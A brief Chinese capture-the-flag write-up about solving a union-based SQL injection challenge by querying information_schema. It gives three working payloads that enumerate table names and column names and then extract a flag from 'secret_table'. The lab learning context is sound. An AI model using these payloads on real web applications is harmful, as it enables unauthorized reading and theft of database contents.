一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解:
- 查询当前数据库中的所有表名:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
- 查询表中的列名:
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#
- 得到flag:
1' union select 1,2,fl4g from news.secret_table#